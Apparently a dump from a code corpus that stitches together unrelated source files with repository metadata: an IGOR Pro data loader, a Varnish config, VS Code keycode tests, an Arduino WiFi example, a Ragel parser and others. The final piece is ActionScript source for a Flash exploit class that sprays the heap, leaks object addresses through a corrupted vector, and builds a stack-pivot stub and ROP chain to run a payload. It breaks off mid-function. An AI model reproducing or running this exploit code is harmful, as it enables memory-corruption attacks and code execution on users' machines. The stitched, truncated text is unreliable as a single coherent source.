Variable sampledelay // Settling time (s) Variable integ // Integration time (s) Variable enddelay // End Settling time (s) Variable zctrl // Z control time (s) Variable rate // Max Slew rate (V/s) String backward // backward sweep String hold // Z-controller hold uint16 sweeps // Number of sweeps String channels // Channels String resetbias // Reset bias String finalz // Record final Z String lockin // Lock-in run String mode // Sweep mode EndStructure Static Structure Nanonis3dsLockin String status // Lock-in status String modulated // Modulated signal Variable freq // Frequency (Hz) Variable amp // Amplitude String signal // Demodulated signal uchar harmonic // Harmonic Variable phase // Reference phase (deg) EndStructure Static Structure Nanonis3dsMain String path // Session path String version // SW Version uint16 ui // UI Release uint16 rt // RT Release Variable freq // RT Frequency (Hz) uint16 oversampling // Signals Oversampling Variable animations // Animations Period (s) Variable indicators // Indicators Period (s) Variable measurements // Measurements Period (s) EndStructure Static Structure Nanonis3dsPiezo String active // Avtive calib. STRUCT vxyz piezo // Calib. X, Y, Z (m/V) STRUCT ixyz gain // HV Gain X, Y, Z STRUCT vxy tilt // Tilt X, Y (deg) STRUCT vxy curvature // Curvature radius X, Y (m) STRUCT vxy correction // 2nd order corr X, Y (V/m^2) STRUCT vxyz drift // Drift X, Y, Z (m/s) String status // Drift correction status (on/off) EndStructure Static Structure Nanonis3dsScan STRUCT vxy center, size // Scanfield Variable angle // Scanfield String name // series name String channels // channels STRUCT ixy pnts // pixels/line, lines Variable forward // speed forw. (m/s) Variable backward // speed backw. (m/s) EndStructure Static Structure Nanonis3dsZCtrl Variable z // Z (m) String name // Controller name String status // Controller status Variable setpoint // Setpoint String unit // Setpoint unit Variable p // P gain Variable i // I gain Variable tconst // Time constant (s) Variable lift // Tiplift (m) Variable delay // Switch off delay (s) EndStructure Static Structure vxyz Variable x Variable y Variable z EndStructure Static Structure vxy Variable x Variable y EndStructure Static Structure ixyz uint16 x uint16 y uint16 z EndStructure Static Structure ixy uint16 x uint16 y EndStructure // Data reading functions. // The resultant waves are saved in the current datafolder. Static Function/WAVE LoadNanonis3dsGetData(String pathStr, STRUCT Nanonis3ds &s) String fileName = ParseFilePath(3, pathStr, ":", 0, 0) // filename w/o an extension GBLoadWave/Q/N=tmp/T={2,4}/S=(s.headerSize)/W=1 pathStr wave w=tmp0 Redimension/N=(ItemsInList(s.paramList)+ItemsInList(s.channels)*s.pnts.z, s.pnts.x, s.pnts.y) w // Make an STM image wave from the big wave Wave stmw = LoadNanonis3dsGetDataParam(w, fileName, s) // Make wave names from the channel information Wave/T namew = LoadNanonis3dsGetDataWaveNames(fileName, s.channels) // Make spectrum waves from the big wave Wave/WAVE specw = LoadNanonis3dsGetDataSpec(w, namew, s) // Calculate the average between the forward and the backward data // unless the shift key is pressed. if (GetKeyState(1)&4) Make/N=(1+numpnts(specw))/WAVE/FREE refw refw[0] = {stmw} refw[1,] = specw[p-1] else Wave/WAVE avgw = LoadNanonisCommonDataAvg("_bwd") Make/N=(1+numpnts(avgw))/WAVE/FREE refw refw[0] = {stmw} refw[1,] = avgw[p-1] endif KillWaves w return refw End // Make an STM image wave from the big wave // The created image wave is saved in the current datafolder. Static Function/WAVE LoadNanonis3dsGetDataParam( Wave w, String fileName, STRUCT Nanonis3ds &s ) Variable xIndex = WhichListItem("X (m)", s.paramList) // 2 Variable yIndex = WhichListItem("Y (m)", s.paramList) // 3 Variable zIndex = WhichListItem("Z (m)", s.paramList) // 4 DFREF dfrSav = GetDataFolderDFR() NewDataFolder/S pos // scan area Make/N=5/FREE xw = {-1, 1, 1, -1, -1}, yw = {-1, -1, 1, 1, -1} Make/N=(2,5) scan scan[0][] = ((xw[q]*cos(s.angle/180*pi) + yw[q]*sin(s.angle/180*pi)) * s.size.x/2 + s.center.x) scan[1][] = ((-xw[q]*sin(s.angle/180*pi) + yw[q]*cos(s.angle/180*pi)) * s.size.y/2 + s.center.y) scan *= SIDAM_NANONIS_LENGTHSCALE // sts points MatrixOP/FREE tw0 = transposeVol(w,4) MatrixOP/FREE stspos_x = fp32(tw0[][][xIndex]) * SIDAM_NANONIS_LENGTHSCALE MatrixOP/FREE stspos_y = fp32(tw0[][][yIndex]) * SIDAM_NANONIS_LENGTHSCALE Concatenate/NP=2 {stspos_x, stspos_y}, stspos Redimension/N=(s.pnts.x*s.pnts.y*2) stspos Redimension/N=(s.pnts.x*s.pnts.y, 2) stspos MatrixTranspose stspos SetDimLabel 0, 0, x, scan, stspos SetDimLabel 0, 1, y, scan, stspos Setscale d 0, 1, SIDAM_NANONIS_LENGTHUNIT, scan, stspos SetDataFolder dfrSav // stm image if (s.pnts.y == 1) //Linecut Make/N=(s.pnts.x) $(fileName+"_Z")/WAVE=topow topow[] = w[zIndex][p] * SIDAM_NANONIS_LENGTHSCALE else Make/N=(s.pnts.x, s.pnts.y) $(fileName+"_Z")/WAVE=topow MultiThread topow[][] = w[zIndex][p][q] * SIDAM_NANONIS_LENGTHSCALE endif SetScale d WaveMin(topow), WaveMax(topow), SIDAM_NANONIS_LENGTHUNIT, w // The measured positions are inside the edge of area by half a pixel SetScale/P x (s.center.x-s.size.x/2+s.size.x/s.pnts.x/2) * SIDAM_NANONIS_LENGTHSCALE\ , s.size.x/s.pnts.x * SIDAM_NANONIS_LENGTHSCALE\ , SIDAM_NANONIS_LENGTHUNIT, topow SetScale/P y (s.center.y-s.size.y/2+s.size.y/s.pnts.y/2) * SIDAM_NANONIS_LENGTHSCALE\ , s.size.y/s.pnts.y * SIDAM_NANONIS_LENGTHSCALE\ , SIDAM_NANONIS_LENGTHUNIT, topow return topow End // Make wave names from the channel information Static Function/WAVE LoadNanonis3dsGetDataWaveNames(String fileName, String chanList) Make/N=(ItemsInList(chanList))/T/FREE namew String nameStr Variable i for (i = 0; i < ItemsInList(chanList); i += 1) nameStr = StringFromList(i, chanList) nameStr = ReplaceString(" (A)", nameStr, "") nameStr = ReplaceString(" (V)", nameStr, "") nameStr = ReplaceString(" omega", nameStr, "") nameStr = ReplaceString(" [bwd]", nameStr, "_bwd") nameStr = ReplaceString(" ", nameStr, "_") nameStr = filename + "_" + nameStr if (strlen(nameStr) > MAX_OBJ_NAME-4) // -4 is for "_bwd" if (strsearch(nameStr, "_bwd", 0) == -1) namew[i] = nameStr[0,MAX_OBJ_NAME-1-4] else nameStr = ReplaceString("_bwd", nameStr, "") namew[i] = nameStr[0,MAX_OBJ_NAME-1-4] + "_bwd" endif else namew[i] = nameStr endif endfor return namew End // Make spectrum waves from the big wave. // The created image waves are saved in the current datafolder. Static Function/WAVE LoadNanonis3dsGetDataSpec( Wave w, Wave/T namew, STRUCT Nanonis3ds &s ) Variable startIndex = WhichListItem("Sweep Start", s.paramList) // 0 Variable endIndex = WhichListItem("Sweep End", s.paramList) // 1 Variable sweepStart = w[startIndex][0][0], sweepEnd = w[endIndex][0][0] Variable nchan = ItemsInList(s.channels), nparam = ItemsInList(s.paramList) int i, v Make/N=(nchan)/FREE/WAVE refw for (i = 0; i < nchan; i++) v = nparam + i*s.pnts.z Duplicate/FREE/R=[v,v+s.pnts.z-1][][] w tw // Doing fp32 before transposeVol is faster than the other way around. MatrixOP/FREE tw2 = fp32(tw) // Make sure if the wave is 3D. // In the case of linecut, the above MatrixOP returns a 2D wave. if (!DimSize(tw2,2)) Redimension/N=(-1,-1,1) tw2 endif // The wave name has to be clean because it may contain ":" MatrixOP $CleanupName(namew[i],1)/WAVE=specw = transposeVol(tw2,4) if (s.pnts.y == 1) // linecut SetScale/I x, 0, s.size.x*SIDAM_NANONIS_LENGTHSCALE\ , SIDAM_NANONIS_LENGTHUNIT, specw else // The measured positions are inside the edge of area by half a pixel SetScale/P x, (s.center.x-s.size.x/2+s.size.x/s.pnts.x/2)*SIDAM_NANONIS_LENGTHSCALE\ , s.size.x/s.pnts.x*SIDAM_NANONIS_LENGTHSCALE\ , SIDAM_NANONIS_LENGTHUNIT, specw SetScale/P y, (s.center.y-s.size.y/2+s.size.y/s.pnts.y/2)*SIDAM_NANONIS_LENGTHSCALE\ , s.size.y/s.pnts.y*SIDAM_NANONIS_LENGTHSCALE\ , SIDAM_NANONIS_LENGTHUNIT, specw endif if (WaveExists(s.mlsw)) // MLS LoadNanonis3dsSetMLSBias(specw, s) else // linear strswitch (s.signal) case "Bias (V)": SetScale/I z, sweepStart*SIDAM_NANONIS_VOLTAGESCALE\ , sweepEnd*SIDAM_NANONIS_VOLTAGESCALE\ , SIDAM_NANONIS_VOLTAGEUNIT, specw break case "Z (m)": SetScale/I z, sweepStart*SIDAM_NANONIS_LENGTHSCALE\ , sweepEnd*SIDAM_NANONIS_LENGTHSCALE\ , SIDAM_NANONIS_LENGTHUNIT, specw break default: SetScale/I z, sweepStart, sweepEnd, "", specw break endswitch if (sweepStart > sweepEnd) Reverse/DIM=2 specw endif endif // Physical values LoadNanonisCommonConversion(specw, driveamp=s.lockin.amp, modulated=s.lockin.modulated) refw[i] = {specw} endfor return refw End // For MLS // Save the values of bias voltage to the dimension label Static Function LoadNanonis3dsSetMLSBias(Wave specw, STRUCT Nanonis3ds &s) Wave mlsw = s.mlsw int segIndex, segSteps, layer, i, n, last Variable segStart, segEnd Make/N=0/FREE ew for (segIndex = 0, layer = 0; segIndex < DimSize(mlsw,0); segIndex++) segStart = mlsw[segIndex][0] segEnd = mlsw[segIndex][1] segSteps = mlsw[segIndex][4] last = (segIndex == DimSize(mlsw,0)-1) ? segSteps : segSteps-1 for (i = 0; i < last; i++, layer++) n = numpnts(ew) Redimension/N=(n+1) ew ew[n] = segStart + (segEnd - segStart) / (segSteps - 1) * i endfor endfor strswitch (s.signal) case "Bias (V)": ew *= SIDAM_NANONIS_VOLTAGESCALE break case "Z (m)": ew *= SIDAM_NANONIS_LENGTHSCALE break default: // do nothing endswitch SIDAMSetBias(specw, ew) End
IGOR Pro
4
yuksk/SIDAM
src/SIDAM/fileloader/Load Nanonis 3ds.ipf
[ "MIT" ]
vcl 4.0; import std; backend default { # Define one backend .host = "localhost"; # IP or Hostname of backend .port = "8080"; # Port Apache or whatever is listening } acl ban { # ACL we'll use later to allow purges "localhost"; "127.0.0.1"; "::1"; } sub vcl_recv { # Normalize the query arguments set req.url = std.querysort(req.url); # Remove the proxy header (see https://httpoxy.org/#mitigate-varnish) unset req.http.proxy; unset req.http.forwarded; # To allow API Platform to ban by cache tags if (req.method == "BAN") { if (client.ip !~ ban) { return(synth(405, "Not allowed")); } if (req.http.ApiPlatform-Ban-Regex) { ban("obj.http.Cache-Tags ~ " + req.http.ApiPlatform-Ban-Regex); return(synth(200, "Ban added")); } return(synth(400, "ApiPlatform-Ban-Regex HTTP header must be set.")); } # Don't cache in dev mode if (req.url ~ "^/app_dev.php") { return(pass); } # Only deal with "normal" types if (req.method != "GET" && req.method != "HEAD" && req.method != "PUT" && req.method != "POST" && req.method != "TRACE" && req.method != "OPTIONS" && req.method != "PATCH" && req.method != "DELETE") { # Non-RFC2616 or CONNECT which is weird. return (pipe); } } sub vcl_hit { if (obj.ttl >= 0s) { # Normal hit return (deliver); } elsif (std.healthy(req.backend_hint)) { # The backend is healthy # Fetch the object from the backend return (fetch); } else { # No fresh object and the backend is not healthy if (obj.ttl + obj.grace > 0s) { # Deliver graced object # Automatically triggers a background fetch return (deliver); } else { # No valid object to deliver # No healthy backend to handle request # Return error return (synth(503, "API is down")); } } } # Handle the HTTP request coming from our backend sub vcl_backend_response { if (beresp.status == 500 || beresp.status == 502 || beresp.status == 503 || beresp.status == 504) { return (abandon); } set beresp.http.url = bereq.url; set beresp.grace = 1h; } # The routine when we deliver the HTTP request to the user # Last chance to modify headers that are sent to the client sub vcl_deliver { if (obj.hits > 0) { # Add debug header to see if it's a HIT/MISS and the number of hits, disable when not needed set resp.http.X-Cache = "HIT"; } else { set resp.http.X-Cache = "MISS"; } # Please note that obj.hits behaviour changed in 4.0, now it counts per objecthead, not per object # and obj.hits may not be reset in some cases where bans are in use. See bug 1492 for details. # So take hits with a grain of salt set resp.http.X-Cache-Hits = obj.hits; # Remove some headers: PHP version unset resp.http.X-Powered-By; # Remove some headers: Apache version & OS unset resp.http.Server; unset resp.http.X-Drupal-Cache; unset resp.http.X-Varnish; unset resp.http.Via; unset resp.http.Link; unset resp.http.X-Generator; unset resp.http.X-Debug-Token; unset resp.http.X-Debug-Token-Link; set resp.http.X-Powered-By = "MSI<[email protected]>"; }
VCL
5
erlangp/SemartHris
docker/varnish/default.vcl
[ "MIT" ]
/*--------------------------------------------------------------------------------------------- * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for license information. *--------------------------------------------------------------------------------------------*/ import * as assert from 'assert'; import { EVENT_KEY_CODE_MAP, IMMUTABLE_CODE_TO_KEY_CODE, IMMUTABLE_KEY_CODE_TO_CODE, KeyChord, KeyCode, KeyCodeUtils, KeyMod, NATIVE_WINDOWS_KEY_CODE_TO_KEY_CODE, ScanCode, ScanCodeUtils } from 'vs/base/common/keyCodes'; import { ChordKeybinding, createKeybinding, Keybinding, SimpleKeybinding } from 'vs/base/common/keybindings'; import { OperatingSystem } from 'vs/base/common/platform'; suite('keyCodes', () => { function testBinaryEncoding(expected: Keybinding | null, k: number, OS: OperatingSystem): void { assert.deepStrictEqual(createKeybinding(k, OS), expected); } test('mapping for Minus', () => { // [147, 83, 0, ScanCode.Minus, 'Minus', KeyCode.US_MINUS, '-', 189, 'VK_OEM_MINUS', '-', 'OEM_MINUS'], assert.strictEqual(EVENT_KEY_CODE_MAP[189], KeyCode.Minus); assert.strictEqual(NATIVE_WINDOWS_KEY_CODE_TO_KEY_CODE['VK_OEM_MINUS'], KeyCode.Minus); assert.strictEqual(ScanCodeUtils.lowerCaseToEnum('minus'), ScanCode.Minus); assert.strictEqual(ScanCodeUtils.toEnum('Minus'), ScanCode.Minus); assert.strictEqual(ScanCodeUtils.toString(ScanCode.Minus), 'Minus'); assert.strictEqual(IMMUTABLE_CODE_TO_KEY_CODE[ScanCode.Minus], KeyCode.DependsOnKbLayout); assert.strictEqual(IMMUTABLE_KEY_CODE_TO_CODE[KeyCode.Minus], ScanCode.DependsOnKbLayout); assert.strictEqual(KeyCodeUtils.toString(KeyCode.Minus), '-'); assert.strictEqual(KeyCodeUtils.fromString('-'), KeyCode.Minus); assert.strictEqual(KeyCodeUtils.toUserSettingsUS(KeyCode.Minus), '-'); assert.strictEqual(KeyCodeUtils.toUserSettingsGeneral(KeyCode.Minus), 'OEM_MINUS'); assert.strictEqual(KeyCodeUtils.fromUserSettings('-'), KeyCode.Minus); assert.strictEqual(KeyCodeUtils.fromUserSettings('OEM_MINUS'), KeyCode.Minus); assert.strictEqual(KeyCodeUtils.fromUserSettings('oem_minus'), KeyCode.Minus); }); test('mapping for Space', () => { // [21, 10, 1, ScanCode.Space, 'Space', KeyCode.Space, 'Space', 32, 'VK_SPACE', empty, empty], assert.strictEqual(EVENT_KEY_CODE_MAP[32], KeyCode.Space); assert.strictEqual(NATIVE_WINDOWS_KEY_CODE_TO_KEY_CODE['VK_SPACE'], KeyCode.Space); assert.strictEqual(ScanCodeUtils.lowerCaseToEnum('space'), ScanCode.Space); assert.strictEqual(ScanCodeUtils.toEnum('Space'), ScanCode.Space); assert.strictEqual(ScanCodeUtils.toString(ScanCode.Space), 'Space'); assert.strictEqual(IMMUTABLE_CODE_TO_KEY_CODE[ScanCode.Space], KeyCode.Space); assert.strictEqual(IMMUTABLE_KEY_CODE_TO_CODE[KeyCode.Space], ScanCode.Space); assert.strictEqual(KeyCodeUtils.toString(KeyCode.Space), 'Space'); assert.strictEqual(KeyCodeUtils.fromString('Space'), KeyCode.Space); assert.strictEqual(KeyCodeUtils.toUserSettingsUS(KeyCode.Space), 'Space'); assert.strictEqual(KeyCodeUtils.toUserSettingsGeneral(KeyCode.Space), 'Space'); assert.strictEqual(KeyCodeUtils.fromUserSettings('Space'), KeyCode.Space); assert.strictEqual(KeyCodeUtils.fromUserSettings('space'), KeyCode.Space); }); test('MAC binary encoding', () => { function test(expected: Keybinding | null, k: number): void { testBinaryEncoding(expected, k, OperatingSystem.Macintosh); } test(null, 0); test(new SimpleKeybinding(false, false, false, false, KeyCode.Enter).toChord(), KeyCode.Enter); test(new SimpleKeybinding(true, false, false, false, KeyCode.Enter).toChord(), KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, false, true, false, KeyCode.Enter).toChord(), KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(true, false, true, false, KeyCode.Enter).toChord(), KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, true, false, false, KeyCode.Enter).toChord(), KeyMod.Shift | KeyCode.Enter); test(new SimpleKeybinding(true, true, false, false, KeyCode.Enter).toChord(), KeyMod.Shift | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, true, true, false, KeyCode.Enter).toChord(), KeyMod.Shift | KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(true, true, true, false, KeyCode.Enter).toChord(), KeyMod.Shift | KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, false, false, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyCode.Enter); test(new SimpleKeybinding(true, false, false, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, false, true, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(true, false, true, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, true, false, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.Enter); test(new SimpleKeybinding(true, true, false, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, true, true, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(true, true, true, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test( new ChordKeybinding([ new SimpleKeybinding(false, false, false, false, KeyCode.Enter), new SimpleKeybinding(false, false, false, false, KeyCode.Tab) ]), KeyChord(KeyCode.Enter, KeyCode.Tab) ); test( new ChordKeybinding([ new SimpleKeybinding(false, false, false, true, KeyCode.KeyY), new SimpleKeybinding(false, false, false, false, KeyCode.KeyZ) ]), KeyChord(KeyMod.CtrlCmd | KeyCode.KeyY, KeyCode.KeyZ) ); }); test('WINDOWS & LINUX binary encoding', () => { [OperatingSystem.Linux, OperatingSystem.Windows].forEach((OS) => { function test(expected: Keybinding | null, k: number): void { testBinaryEncoding(expected, k, OS); } test(null, 0); test(new SimpleKeybinding(false, false, false, false, KeyCode.Enter).toChord(), KeyCode.Enter); test(new SimpleKeybinding(false, false, false, true, KeyCode.Enter).toChord(), KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, false, true, false, KeyCode.Enter).toChord(), KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(false, false, true, true, KeyCode.Enter).toChord(), KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, true, false, false, KeyCode.Enter).toChord(), KeyMod.Shift | KeyCode.Enter); test(new SimpleKeybinding(false, true, false, true, KeyCode.Enter).toChord(), KeyMod.Shift | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(false, true, true, false, KeyCode.Enter).toChord(), KeyMod.Shift | KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(false, true, true, true, KeyCode.Enter).toChord(), KeyMod.Shift | KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(true, false, false, false, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyCode.Enter); test(new SimpleKeybinding(true, false, false, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(true, false, true, false, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(true, false, true, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(true, true, false, false, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyCode.Enter); test(new SimpleKeybinding(true, true, false, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyMod.WinCtrl | KeyCode.Enter); test(new SimpleKeybinding(true, true, true, false, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyMod.Alt | KeyCode.Enter); test(new SimpleKeybinding(true, true, true, true, KeyCode.Enter).toChord(), KeyMod.CtrlCmd | KeyMod.Shift | KeyMod.Alt | KeyMod.WinCtrl | KeyCode.Enter); test( new ChordKeybinding([ new SimpleKeybinding(false, false, false, false, KeyCode.Enter), new SimpleKeybinding(false, false, false, false, KeyCode.Tab) ]), KeyChord(KeyCode.Enter, KeyCode.Tab) ); test( new ChordKeybinding([ new SimpleKeybinding(true, false, false, false, KeyCode.KeyY), new SimpleKeybinding(false, false, false, false, KeyCode.KeyZ) ]), KeyChord(KeyMod.CtrlCmd | KeyCode.KeyY, KeyCode.KeyZ) ); }); }); });
TypeScript
4
sbj42/vscode
src/vs/base/test/common/keyCodes.test.ts
[ "MIT" ]
[[albums.songs]] name = "Glory Days"
TOML
1
vanillajonathan/julia
stdlib/TOML/test/testfiles/valid/table-array-implicit.toml
[ "Zlib" ]
#include <WiFiManager.h> // https://github.com/tzapu/WiFiManager bool _enteredConfigMode = false; void setup(){ Serial.begin(115200); WiFiManager wifiManager; // wifiManager.setAPCallback([this](WiFiManager* wifiManager) { wifiManager.setAPCallback([&](WiFiManager* wifiManager) { Serial.printf("Entered config mode:ip=%s, ssid='%s'\n", WiFi.softAPIP().toString().c_str(), wifiManager->getConfigPortalSSID().c_str()); _enteredConfigMode = true; }); wifiManager.resetSettings(); if (!wifiManager.autoConnect()) { Serial.printf("*** Failed to connect and hit timeout\n"); ESP.restart(); delay(1000); } } void loop(){ }
Arduino
4
ortlof/OSSM-hardware
PlatformIO ESP32 code/OSSM_ESP32/lib/WiFiManager-master/examples/Unique/cb/AnonymousCB.ino
[ "MIT" ]
size: 200px 60px; dpi: 96; legend { item { label: "Fnord Test"; color: #06c; marker-shape: hexagon; } }
CLIPS
2
asmuth-archive/travistest
test/legend/legend_item_default.clp
[ "Apache-2.0" ]
// // ShareData.h // ShareExtension // // Created by Duncan Cunningham on 2/6/21. // Copyright © 2021 joplinapp.org. All rights reserved. // #import <Foundation/Foundation.h> @interface ShareData : NSObject @property (nonatomic, strong) NSString* title; @property (nonatomic, strong) NSString* text; @property (nonatomic, strong) NSArray<NSDictionary*>* resources; - (id)initWithDictionary:(NSDictionary*)dictionary; - (NSDictionary*)encodeToDictionary; + (NSDictionary*)resourceDictionaryForURL:(NSString*)url withName:(NSString*)name andMimeType:(NSString*)mimeType; + (NSString*)resourceURLFromDictionary:(NSDictionary*)dictionary; @end
C
4
asahiocean/joplin
packages/app-mobile/ios/ShareExtension/Source/Common/ShareData.h
[ "MIT" ]
/* * Copyright (c) 2015-2017, Intel Corporation * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * * Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * Neither the name of Intel Corporation nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ #include "config.h" #include "ColliderCorporaParser.h" #include "Corpora.h" #include "ue2common.h" #include <cassert> #include <cstdlib> #include <string> #include <cstdio> using namespace std; namespace /* anonymous */ { // Take a string like '\xFF' and convert it to the character it represents char unhex(const char *start, UNUSED const char *end) { assert(start + 4 == end); assert(start[0] == '\\'); assert(start[1] == 'x'); assert(isxdigit(start[2])); assert(isxdigit(start[2])); char temp[3] = {start[2], start[3], 0}; return strtol(temp, nullptr, 16); } %%{ machine FileCorporaParser; action accumulateNum { num = (num * 10) + (fc - '0'); } action handleHexEscaped { sout.push_back(unhex(ts, te)); } action handleSpecial { switch (*(ts+1)) { case '0': sout.push_back('\x00'); break; case 'a': sout.push_back('\x07'); break; case 'e': sout.push_back('\x1b'); break; case 'f': sout.push_back('\x0c'); break; case 'n': sout.push_back('\x0a'); break; case 'v': sout.push_back('\x0b'); break; case 'r': sout.push_back('\x0d'); break; case 't': sout.push_back('\x09'); break; default: fbreak; } } action handleMatch { c.matches.insert(num); } write data; }%% } // namespace bool parseCorpus(const string &line, Corpus &c, unsigned int &id) { const char *p = line.c_str(); const char *pe = p + line.size(); const char *eof = pe; const char *ts; const char *te; int cs; UNUSED int act; // For storing integers as they're scanned unsigned int num = 0; string &sout = c.data; %%{ id = ( digit @accumulateNum)+ >{num = 0;} @{id = num;}; backslashed = '\\' ^alnum; specials = '\\' [0aefnvrt]; hexescaped = '\\x' xdigit{2}; corpus_old := |* hexescaped => handleHexEscaped; specials => handleSpecial; backslashed => { sout.push_back(*(ts + 1)); }; any => { sout.push_back(*ts); }; *|; corpus_new := |* hexescaped => handleHexEscaped; specials => handleSpecial; backslashed => { sout.push_back(*(ts + 1)); }; any - '"' => { sout.push_back(*ts); }; '"' => { fgoto colon_sep; }; *|; colon_sep := |* ':' => {fgoto match_list; }; *|; match_list := |* (' '* (digit @accumulateNum)+ ' '* ','?) >{num = 0;} => handleMatch; *|; # Old simple line format line_old = id ':' @{ fgoto corpus_old; }; # New line format with matches line_new = id "=\"" @{ c.hasMatches = true; fgoto corpus_new; }; main := ( line_new | line_old ); # Initialize and execute write init; write exec; }%% return (cs != FileCorporaParser_error) && (p == pe); }
Ragel in Ruby Host
5
jtravee/neuvector
dp/third-party/hyperscan/tools/hscollider/ColliderCorporaParser.rl
[ "Apache-2.0" ]
package { import flash.utils.ByteArray import flash.system.System public class Exploiter { private const VECTOR_OBJECTS_LENGTH:uint = 1014 private var exploit:Exploit private var ev:ExploitVector private var eba:ExploitByteArray private var payload:ByteArray private var platform:String private var pos:uint private var byte_array_object:uint private var main:uint private var stack_object:uint private var payload_space_object:uint private var buffer_object:uint private var magic:uint private var magic_arg0:uint private var magic_arg1:uint private var magic_object:uint private var magic_table:uint private var buffer:uint private var vtable:uint private var stack_address:uint private var payload_address:uint private var stub_address:uint private var stub_space_object:uint private var stub:Vector.<uint> = new Vector.<uint>(8) private var stack:Vector.<uint> = new Vector.<uint>(0x6400) private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) private var spray:Vector.<Object> = new Vector.<Object>(90000) public function Exploiter(exp:Exploit, pl:String, p:ByteArray, uv:Vector.<uint>, uv_length:uint):void { exploit = exp payload = p platform = pl ev = new ExploitVector(uv, uv_length) if (!ev.is_ready()) return eba = new ExploitByteArray(platform) spray_objects() try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; } ev.set_own_address(pos) if (!disclose_objects()) { ev.restore(); cleanup(); return; } disclose_addresses() corrupt_byte_array() if (!eba.is_ready()) { ev.restore(); cleanup(); return } do_rop() restore_byte_array() ev.restore() cleanup() } static function Magic(...a){} private function spray_objects():void { Logger.log("[*] Exploiter - spray_objects()") // mov eax,[esp+0x4] // xchg eax,esp // rets stub[0] = 0x0424448B stub[1] = 0x0000C394 for (var i:uint = 0; i < spray.length; i++) { spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH) spray[i][0] = eba.ba spray[i][1] = exploit spray[i][2] = stack spray[i][3] = payload_space spray[i][4] = Magic spray[i][5] = stub } } private function search_objects():uint { Logger.log("[*] Exploiter - search_objects()") var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100) return idx + 1 } private function disclose_objects():Boolean { Logger.log("[*] Exploiter - disclose_objects()") byte_array_object = ev.at(pos) - 1 main = ev.at(pos + 1) - 1 stack_object = ev.at(pos + 2) - 1 payload_space_object = ev.at(pos + 3) - 1 magic = ev.at(pos + 4) - 1 stub_space_object = ev.at(pos + 5) - 1 if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) { return false } return true } private function disclose_addresses():void { Logger.log("[*] Exploiter - disclose_addresses()") if (platform == "linux") { buffer_object = ev.read(byte_array_object + 0x10) buffer = ev.read(buffer_object + 0x1c) } else if (platform == "win") { buffer_object = 